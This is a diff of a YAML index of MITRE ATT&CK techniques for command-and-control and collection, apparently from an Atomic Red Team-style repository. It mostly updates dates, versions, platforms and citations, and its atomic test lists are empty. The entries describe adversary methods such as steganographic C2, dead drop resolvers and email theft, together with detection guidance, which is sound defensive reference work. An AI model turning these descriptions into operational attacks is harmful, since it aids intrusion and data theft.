       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1132.002:
     technique:
@@ -38470,7 +38960,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-14T23:39:50.117Z'
       name: Non-Standard Encoding
       description: 'Adversaries may encode data with a non-standard data encoding
         system to make the content of command and control traffic more difficult to
@@ -38496,8 +38986,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.001:
     technique:
@@ -38564,7 +39052,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071.001
     atomic_tests: []
   T1105:
@@ -38662,7 +39149,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1105
     atomic_tests: []
   T1665:
@@ -38755,7 +39241,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1001.002:
     technique:
@@ -38779,7 +39264,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-15T00:37:58.963Z'
       name: Data Obfuscation via Steganography
       description: 'Adversaries may use steganographic techniques to hide command
         and control traffic to make detection efforts more difficult. Steganographic
@@ -38802,8 +39287,6 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1001.002
     atomic_tests: []
   T1008:
@@ -38828,7 +39311,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:49:47.340Z'
       name: Fallback Channels
       description: Adversaries may use fallback or alternate communication channels
         if the primary channel is compromised or inaccessible in order to maintain
@@ -38848,8 +39331,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1090.001:
     technique:
@@ -38903,7 +39384,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1090.001
     atomic_tests: []
   T1102.001:
@@ -38928,7 +39408,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:12:30.499Z'
       name: Dead Drop Resolver
       description: |-
         Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
@@ -38954,8 +39434,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1001.001:
     technique:
@@ -39009,7 +39487,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 collection:
   T1560.001:
@@ -39085,7 +39562,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1560.001
     atomic_tests: []
   T1113:
@@ -39142,7 +39618,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1113
     atomic_tests: []
   T1557:
@@ -39236,7 +39711,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.001:
     technique:
@@ -39315,7 +39789,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.001
     atomic_tests: []
   T1602:
@@ -39354,7 +39827,7 @@ collection:
         Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
 
         Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T21:32:58.274Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Data from Configuration Repository
       x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
@@ -39369,30 +39842,10 @@ collection:
       - 'Network Traffic: Network Connection Creation'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
-      type: attack-pattern
-      created: '2020-02-14T13:35:32.938Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1213.002
-        url: https://attack.mitre.org/techniques/T1213/002
-      - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
-        description: Microsoft. (2017, July 19). Configure audit settings for a site
-          collection. Retrieved April 4, 2018.
-        source_name: Microsoft SharePoint Logging
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Sharepoint
       description: |
         Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
@@ -39401,13 +39854,17 @@ collection:
         * Physical / logical network diagrams
         * System architecture diagrams
         * Technical system documentation
-        * Testing / development credentials
+        * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
         * Work / project schedules
         * Source code snippets
         * Links to network shares and other internal resources
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: "The user access logging within Microsoft's SharePoint can
         be configured to report access to certain pages and documents. (Citation:
         Microsoft SharePoint Logging). As information repositories generally have
@@ -39421,20 +39878,37 @@ collection:
         of programmatic means being used to retrieve all data within the repository.
         In environments with high-maturity, it may be possible to leverage User-Behavioral
         Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      - 'Cloud Service: Cloud Service Metadata'
+      type: attack-pattern
+      id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
+      created: '2020-02-14T13:35:32.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/002
+        external_id: T1213.002
+      - source_name: Microsoft SharePoint Logging
+        description: Microsoft. (2017, July 19). Configure audit settings for a site
+          collection. Retrieved April 4, 2018.
+        url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
     atomic_tests: []
   T1123:
     technique:
-      modified: '2024-01-23T22:53:18.389Z'
+      modified: '2024-10-15T13:39:22.774Z'
       name: Audio Capture
       description: |-
         An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)
@@ -39477,7 +39951,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1123
     atomic_tests: []
   T1560.003:
@@ -39502,7 +39975,7 @@ collection:
         description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
           the Comings and Goings. Retrieved November 21, 2016.'
         source_name: ESET Sednit Part 2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T22:48:14.605Z'
       name: Archive via Custom Method
       description: 'An adversary may compress or encrypt data that is collected prior
         to exfiltration using a custom method. Adversaries may choose to use custom
@@ -39522,22 +39995,24 @@ collection:
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Script: Script Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1114:
     technique:
-      modified: '2023-09-29T21:06:03.098Z'
+      modified: '2024-10-15T12:24:27.627Z'
       name: Email Collection
       description: 'Adversaries may target user email to collect sensitive information.
         Emails may contain sensitive data, including trade secrets or personal information,
-        that can prove valuable to adversaries. Adversaries can collect or forward
-        email from mail servers or clients. '
+        that can prove valuable to adversaries. Emails may also contain details of
+        ongoing incident response operations, which may allow adversaries to adjust
+        their techniques in order to maintain persistence or evade defenses.(Citation:
+        TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries
+        can collect or forward email from mail servers or clients. '
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
       x_mitre_contributors:
       - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
@@ -39554,11 +40029,10 @@ collection:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
       - macOS
       - Linux
-      x_mitre_version: '2.5'
+      - Office Suite
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -39574,37 +40048,28 @@ collection:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1114
         external_id: T1114
+      - source_name: CISA AA20-352A 2021
+        description: CISA. (2021, April 15). Advanced Persistent Threat Compromise
+          of Government Agencies, Critical Infrastructure, and Private Sector Organizations.
+          Retrieved August 30, 2024.
+        url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a
       - source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
         description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
           Retrieved October 8, 2019.
         url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+      - source_name: TrustedSec OOB Communications
+        description: 'Tyler Hudak. (2022, December 29). To OOB, or Not to OOB?: Why
+          Out-of-Band Communications are Essential for Incident Response. Retrieved
+          August 30, 2024.'
+        url: https://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-incident-response
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1025:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - William Cain
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
-      type: attack-pattern
-      created: '2017-05-31T21:30:31.584Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        url: https://attack.mitre.org/techniques/T1025
-        external_id: T1025
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:30:50.936Z'
       name: Data from Removable Media
       description: "Adversaries may search connected removable media on computers
         they have compromised to find files of interest. Sensitive data can be collected
@@ -39616,75 +40081,93 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - William Cain
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor processes and command-line arguments for actions
         that could be taken to collect files from a system's connected removable media.
         Remote access tools with built-in features may interact directly with the
         Windows API to gather data. Data may also be acquired through Windows system
         management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
         and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Access'
       x_mitre_system_requirements:
       - Privileges to access removable media drive and files
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
+      created: '2017-05-31T21:30:31.584Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1025
+        external_id: T1025
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1025
     atomic_tests: []
   T1074.001:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Massimiliano Romano, BT Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
-      created: '2020-03-13T21:13:10.467Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074.001
-        url: https://attack.mitre.org/techniques/T1074/001
-      - source_name: Prevailion DarkWatchman 2021
-        url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
-        description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
-          new evolution in fileless techniques. Retrieved January 10, 2022.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-08-26T16:28:39.920Z'
+      name: 'Data Staged: Local Data Staging'
       description: |-
         Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
 
         Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Data Staged: Local Data Staging'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Massimiliano Romano, BT Security
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
 
         Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: collection
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
+      created: '2020-03-13T21:13:10.467Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074/001
+        external_id: T1074.001
+      - source_name: Prevailion DarkWatchman 2021
+        description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
+          new evolution in fileless techniques. Retrieved January 10, 2022.'
+        url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1074.001
     atomic_tests: []
   T1114.001:
@@ -39711,7 +40194,7 @@ collection:
         url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
         description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
           .ost). Retrieved February 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T17:59:20.983Z'
       name: 'Email Collection: Local Email Collection'
       description: |-
         Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
@@ -39735,13 +40218,11 @@ collection:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1114.001
     atomic_tests: []
   T1119:
     technique:
-      modified: '2024-01-02T13:35:57.680Z'
+      modified: '2024-09-25T20:40:07.791Z'
       name: Automated Collection
       description: "Once established within a system or network, an adversary may
         use automated techniques for collecting internal data. Methods for performing
@@ -39762,6 +40243,7 @@ collection:
         phase_name: collection
       x_mitre_contributors:
       - Praetorian
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Depending on the method used, actions could include common
         file system commands and parameters on the command-line interface within batch
@@ -39785,8 +40267,10 @@ collection:
       - Windows
       - IaaS
       - SaaS
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
+      - 'User Account: User Account Authentication'
       - 'Command: Command Execution'
       - 'File: File Access'
       - 'Script: Script Execution'
@@ -39811,7 +40295,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1119
     atomic_tests: []
   T1115:
@@ -39878,12 +40361,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1115
     atomic_tests: []
   T1530:
     technique:
-      modified: '2023-09-29T16:11:43.530Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Data from Cloud Storage Object
       description: "Adversaries may access data from cloud storage.\n\nMany IaaS providers
         offer solutions for online data object storage such as Amazon S3, Azure Storage,
@@ -39917,10 +40399,12 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Netskope
       - Praetorian
       - AppOmni
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
         service. Activity originating from unexpected sources may indicate improper
@@ -39931,13 +40415,14 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Office 365
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Metadata'
       - 'Cloud Storage: Cloud Storage Access'
       type: attack-pattern
       id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
@@ -39978,37 +40463,11 @@ collection:
         url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1530
     atomic_tests: []
   T1074.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - IaaS
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
-      type: attack-pattern
-      created: '2020-03-13T21:14:58.206Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074.002
-        url: https://attack.mitre.org/techniques/T1074/002
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.414Z'
       name: Remote Data Staging
       description: |-
         Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
@@ -40019,23 +40478,47 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Command: Command Execution'
       - 'File: File Access'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
+      created: '2020-03-13T21:14:58.206Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074/002
+        external_id: T1074.002
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-12T23:54:39.466Z'
       name: Data from Local System
       description: |
         Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
@@ -40105,7 +40588,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1005
     atomic_tests: []
   T1560.002:
@@ -40140,7 +40622,7 @@ collection:
         description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
           April 22, 2016.
         source_name: Wikipedia File Header Signatures
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T18:27:30.891Z'
       name: 'Archive Collected Data: Archive via Library'
       description: |-
         An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
@@ -40159,10 +40641,89 @@ collection:
       x_mitre_data_sources:
       - 'Script: Script Execution'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1560.002
     atomic_tests: []
+  T1557.004:
+    technique:
+      modified: '2024-11-11T18:52:53.686Z'
+      name: Evil Twin
+      description: "Adversaries may host seemingly genuine Wi-Fi access points to
+        deceive users into connecting to malicious networks as a way of supporting
+        follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+        [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+        or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+        ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
